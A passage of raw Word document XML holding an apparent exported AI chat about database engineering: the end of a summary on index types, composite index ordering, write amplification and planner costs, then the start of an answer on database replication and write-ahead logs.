      </w:r>
    </w:p>
    <w:p w14:paraId="208EA0F2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Write cost:    1 write becomes k writes (one per index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC12DCC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0006A256" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index Data Structure Selection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E6BB3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  B-Tree:   Universal choice — equality, range, sort, prefix, ORDER BY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C67D30" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">            Standard for OLTP, general purpose, most queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BD3C52" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Hash:     Equality-only workloads, 50% fewer reads than B-Tree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC0120A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            Only when range/sort queries never needed on that column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4580E1C0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  LSM-Tree: Write-heavy workloads — SSTables + MemTable + compaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C614D9A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">            Used by: RocksDB, Cassandra, LevelDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEAF865" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">            Trade: high write throughput for high read amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40480073" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  GIN:      Composite values — full-text, arrays, JSONB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254619BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">            Inverted index: token → posting list of containing documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5638F6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  GiST:     Geometric, range, and custom data type queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD3EBEA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">            R-Tree variant for spatial data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400E52D7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  BRIN:     Large tables with correlated physical-logical ordering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008CCBFD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">            Orders-of-magnitude smaller than B-Tree, requires correlation ≥ 0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A6022" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C6CD2C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The Left-Prefix Rule (composite indexes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B9E7A4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index (a, b, c) supports: a, (a,b), (a,b,c) — NOT b alone, c alone, (b,c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F847DB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Rule: equality predicates first, then range predicates, then sort columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E98F20" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52248E0C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Column ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A50E1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Equality columns before range columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD9E82" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    High-cardinality before low-cardinality (for equality)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA6A1BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Sort column last (enables index-ordered output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4297B88F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="51902B2D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Write Amplification Reality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D54666" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Each index: 1 additional write per INSERT/DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFA83DB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">              1-2 additional writes per UPDATE (if indexed columns change)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A1495E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  5 indexes on write-heavy table: 6× write amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718868B2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index count directly reduces write throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192574CB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Unused indexes are pure overhead — audit and drop regularly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFE5A99" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="54E68B07" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The Planner's Cost Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B707784" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Chooses index when: index_cost &lt; sequential_scan_cost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A5D2FB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index scan wins: &lt; 5-15% selectivity (few rows match)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389B9A5C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Sequential scan wins: &gt; 15-30% selectivity (many rows match)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447D9795" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Set random_page_cost correctly for your storage type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212D1901" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    HDD: 4.0 (default — random is 40× slower than sequential)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A250817" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    SSD: 1.5-2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B43431" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    NVMe: 1.1-1.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714333D5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3A287222" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index Design Methodology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAF50A7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1. Analyze query patterns (frequency × columns × equality/range/sort)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB5E964" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. Design composite indexes for high-frequency queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C7692F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     (equality cols first, range cols next, INCLUDE projected cols)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B1155" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  3. Use partial indexes for sparse data or filtered subsets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7374BAE0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  4. Use expression indexes for function-transformed columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60320AC6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  5. Measure with EXPLAIN ANALYZE (before and after)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD4413E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  6. Monitor pg_stat_user_indexes for unused indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD7D645" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  7. Drop unused indexes — they're pure write overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243DA86" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="60232F21" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The Key Operational Concerns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D3E6C5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Bloat:     Dead tuples inflate index size; VACUUM/REINDEX CONCURRENTLY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C48EEFB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  HOT:       Set fill_factor &lt; 100 to enable HOT updates on heap pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3504DDBD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Online:    CREATE/DROP INDEX CONCURRENTLY for zero-downtime operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BB6B3D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Planner:   Update statistics (ANALYZE) after large data changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0DB2E4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">             Set cost parameters correctly for storage type (random_page_cost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B94A35B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="504B9B52" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The Dangerous Anti-Patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F927AA4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index on every column:    Unbounded write amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3177EE53" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Wrong column order:       Index unused for common queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FEACA8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  UUID primary key (InnoDB): Random writes → fragmentation → performance cliff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2532A650" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Missing CONCURRENTLY:     Index builds block production writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23231984" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Ignoring bloat:           Index 5× larger than necessary → more cache misses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14969740" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Forcing hints:            Overrides planner, breaks as data changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703531DD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Over-indexing write tables: 10 indexes at 10K inserts/sec = 100K index writes/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C6CD4B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>an index is a materialized, continuously maintained, always-consistent auxiliary data structure that represents a specific query pattern's access path — and every index is a bet that the read savings will exceed the write costs, maintenance overhead, and storage cost over the lifetime of that data.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Indexes are not free performance — they are a performance trade-off contract that must be continuously re-evaluated as query patterns change, data grows, and access distributions shift. The engineers who build the fastest data systems are not those who index the most — they are those who understand the relationship between physical storage layout, access patterns, and the mathematical properties of their chosen data structures well enough to index exactly what needs to be indexed and nothing more. An unused index on a write-heavy table is not a neutral artifact — it is an active tax on every write operation, consuming I/O, CPU, buffer pool memory, and write throughput, while providing zero benefit in return. Indexing discipline — adding indexes for concrete query requirements and aggressively removing indexes that don't earn their cost — is one of the highest-leverage database engineering practices that separates systems that perform consistently at scale from those that degrade mysteriously as they grow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E59A1BE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copilot said: # Database Replication — Deep Technical Breakdown --- ##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9EE7B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Replication — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2B39E9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="2E8E3EF6">
          <v:rect id="_x0000_i5509" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B595392" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Database Replication Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7DD29" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">Database replication is not simply "copying data to multiple servers." That describes the mechanism but misses the engineering depth entirely. Replication is the discipline </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>of </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>maintaining multiple, synchronized copies of a dataset across independent failure domains while managing the fundamental tension between consistency, availability, and performance that emerges whenever the same data exists in more than one place simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061C2E90" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The engineering problem replication solves operates on three distinct axes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0232F46D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Durability Axis:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> A single database server is a single point of failure. A disk failure, a kernel panic, a datacenter power outage — any of these destroys the only copy of the data. Replication distributes data across independent failure domains (different servers, racks, datacenters, geographic regions) so that no single failure destroys all copies. The engineering challenge: copies must be </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>consistent</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — a committed transaction must survive the failure of any subset of nodes without loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D7B038" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Availability Axis:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> A single database server cannot serve requests during maintenance, upgrades, or failures. Replication enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>failover</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — promoting a replica to primary when the primary fails. The engineering challenge: the window between primary failure and replica promotion must be minimal, the replica must be sufficiently current, and the promotion must not cause data loss or double-processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28903E26" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Scalability Axis:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> A single database server has finite read throughput. Replication enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>read scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — distributing read queries across multiple replicas. The engineering challenge: replicas are not perfectly synchronized with the primary — they lag by some replication delay. Reads from replicas may return stale data. The system must make explicit choices about which reads can tolerate staleness and which cannot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ACEE47" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>These three axes are deeply interconnected. Stronger durability guarantees (synchronous replication, more replicas) reduce availability (writes must wait for more acknowledgments, more nodes to coordinate) and increase write latency. Better availability (asynchronous replication, fast failover) weakens durability (some committed transactions may be lost in failover). Understanding replication requires understanding these trade-offs at every level of the stack — from the byte-level structure of write-ahead logs to the distributed systems theory of consensus protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453DF5A8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="221238A3">
          <v:rect id="_x0000_i5510" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505FC07" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. The Physical Foundation — What Gets Replicated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A29C1F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Write-Ahead Log — The Substrate of Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564C033D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Every replicated database system is built on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Ahead Log (WAL)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve"> — the ordered, durable record of every change made to the database. The WAL is not an artifact of </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>replication — it exists for crash recovery. Replication is the secondary consumer of the WAL stream.</w:t>
      </w:r>
    </w:p>
